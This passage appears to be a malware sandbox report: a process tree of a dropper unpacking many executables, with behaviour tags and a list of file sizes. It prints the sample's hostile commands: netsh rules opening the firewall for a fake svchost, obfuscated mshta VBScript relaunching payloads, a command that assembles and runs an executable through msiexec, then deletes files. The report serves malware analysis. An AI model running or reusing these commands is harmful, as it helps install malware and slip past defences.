C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes8⤵
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes8⤵
-
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue20fd8bc87d.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue20fd8bc87d.exeTue20fd8bc87d.exe5⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1400 -s 14046⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue209130fc0548.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue209130fc0548.exeTue209130fc0548.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue20fbed1f90.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue20fbed1f90.exeTue20fbed1f90.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBScRiPt: cLOsE(CREaTeOBject ( "WSCRipt.sHEll" ). Run ( "CMd /r tYpE ""C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue20fbed1f90.exe"" > ..\_4SO.EXE && sTARt ..\_4SO.Exe /PZOIMJIYi~u3pALhs & If """"== """" for %Y In ( ""C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue20fbed1f90.exe"" ) do taskkill /IM ""%~nXY"" -f" , 0, tRUE ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r tYpE "C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue20fbed1f90.exe" >..\_4SO.EXE && sTARt ..\_4SO.Exe /PZOIMJIYi~u3pALhs& If ""== "" for %Y In ( "C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue20fbed1f90.exe" ) do taskkill /IM "%~nXY" -f7⤵
-
C:\Users\Admin\AppData\Local\Temp\_4SO.EXE..\_4SO.Exe /PZOIMJIYi~u3pALhs8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBScRiPt: cLOsE(CREaTeOBject ( "WSCRipt.sHEll" ). Run ( "CMd /r tYpE ""C:\Users\Admin\AppData\Local\Temp\_4SO.EXE"" > ..\_4SO.EXE && sTARt ..\_4SO.Exe /PZOIMJIYi~u3pALhs & If ""/PZOIMJIYi~u3pALhs""== """" for %Y In ( ""C:\Users\Admin\AppData\Local\Temp\_4SO.EXE"" ) do taskkill /IM ""%~nXY"" -f" , 0, tRUE ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r tYpE "C:\Users\Admin\AppData\Local\Temp\_4SO.EXE" >..\_4SO.EXE && sTARt ..\_4SO.Exe /PZOIMJIYi~u3pALhs& If "/PZOIMJIYi~u3pALhs"== "" for %Y In ( "C:\Users\Admin\AppData\Local\Temp\_4SO.EXE" ) do taskkill /IM "%~nXY" -f10⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCripT: clOsE ( crEatEobJECT ( "WSCRIPt.SHELL" ). RUn ( "cMD.exE /q /C ecHo | SET /p = ""MZ"" >5~XZ.D & COpy /y /b 5~xz.D + LaXZ3lI.UF+ 53Bv.3un +3B8VN.JpX ..\WOYVBNM.9 & stArt msiexec -y ..\WOYVBnm.9 & dEL /Q * " , 0 , tRue ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C ecHo | SET /p = "MZ" >5~XZ.D &COpy /y /b 5~xz.D + LaXZ3lI.UF+ 53Bv.3un +3B8VN.JpX ..\WOYVBNM.9 & stArt msiexec -y ..\WOYVBnm.9 & dEL /Q *10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ecHo "11⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /p = "MZ" 1>5~XZ.D"11⤵
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -y ..\WOYVBnm.911⤵
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM "Tue20fbed1f90.exe" -f8⤵
- Kills process with taskkill
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue20510b1c66a66b665.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue20510b1c66a66b665.exeTue20510b1c66a66b665.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue200479fad46beb53.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue200479fad46beb53.exeTue200479fad46beb53.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue200479fad46beb53.exeC:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue200479fad46beb53.exe6⤵
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue200479fad46beb53.exeC:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue200479fad46beb53.exe6⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue20048630865b1f7.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue20048630865b1f7.exeTue20048630865b1f7.exe5⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue204af04ad6fd53.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue204af04ad6fd53.exeTue204af04ad6fd53.exe5⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue207f806ce7e443b.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue207f806ce7e443b.exeTue207f806ce7e443b.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue20ad8790ff9b.exe /mixone4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue20ad8790ff9b.exeTue20ad8790ff9b.exe /mixone5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Tue20ad8790ff9b.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue20ad8790ff9b.exe" & exit6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Tue20ad8790ff9b.exe" /f7⤵
- Kills process with taskkill
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue203edd6122.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue203edd6122.exeTue203edd6122.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue203edd6122.exeC:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue203edd6122.exe6⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue20c444de2096ff.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue20c444de2096ff.exeTue20c444de2096ff.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1432 -s 9206⤵
- Program crash
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue2014c4fcdb03.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue2014c4fcdb03.exeTue2014c4fcdb03.exe5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue20862a9d941f2ba5a.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue20862a9d941f2ba5a.exeTue20862a9d941f2ba5a.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue20862a9d941f2ba5a.exeC:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue20862a9d941f2ba5a.exe6⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue20d9fa8465d82c.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue20d9fa8465d82c.exeTue20d9fa8465d82c.exe5⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3736 -s 5204⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-LQ3BD.tmp\Tue204af04ad6fd53.tmp"C:\Users\Admin\AppData\Local\Temp\is-LQ3BD.tmp\Tue204af04ad6fd53.tmp" /SL5="$7006C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue204af04ad6fd53.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue204af04ad6fd53.exe"C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue204af04ad6fd53.exe" /SILENT2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-SGIN1.tmp\Tue204af04ad6fd53.tmp"C:\Users\Admin\AppData\Local\Temp\is-SGIN1.tmp\Tue204af04ad6fd53.tmp" /SL5="$101F8,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue204af04ad6fd53.exe" /SILENT3⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵
-
C:\Users\Admin\AppData\Roaming\vsrhtgwC:\Users\Admin\AppData\Roaming\vsrhtgw1⤵
-
C:\Users\Admin\AppData\Local\Temp\6E57.exeC:\Users\Admin\AppData\Local\Temp\6E57.exe1⤵
-
C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\CCB.exeC:\Users\Admin\AppData\Local\Temp\CCB.exe1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
456KB
-
Filesize
456KB
-
Filesize
456KB
-
Filesize
456KB
-
Filesize
456KB
-
Filesize
1.4MB
-
Filesize
1.4MB
-
Filesize
456KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
43.1MB
-
Filesize
1.3MB
-
Filesize
164KB
-
Filesize
456KB
-
Filesize
4KB
-
Filesize
1.3MB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
316KB
-
Filesize
19.0MB
-
Filesize
568KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
456KB
-
Filesize
456KB
-
Filesize
456KB
-
Filesize
456KB
-
Filesize
456KB
-
Filesize
456KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
88KB
-
Filesize
36KB
-
Filesize
43.0MB
-
Filesize
696KB
-
Filesize
692KB
-
Filesize
692KB
-
Filesize
1.5MB
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
1.5MB
-
Filesize
1.5MB
-
Filesize
1.5MB
-
Filesize
152KB
-
Filesize
100KB
-
Filesize
572KB
-
Filesize
572KB
-
Filesize
572KB
-
Filesize
100KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
80KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
308KB
-
Filesize
456KB
-
Filesize
136KB
-
Filesize
6.0MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
80KB
-
Filesize
6.0MB
-
Filesize
136KB
-
Filesize
12KB
-
Filesize
4KB
-
Filesize
456KB
-
Filesize
1.0MB
-
Filesize
108KB
-
Filesize
6.0MB
-
Filesize
4KB
-
Filesize
384KB
-
Filesize
1.0MB
-
Filesize
372KB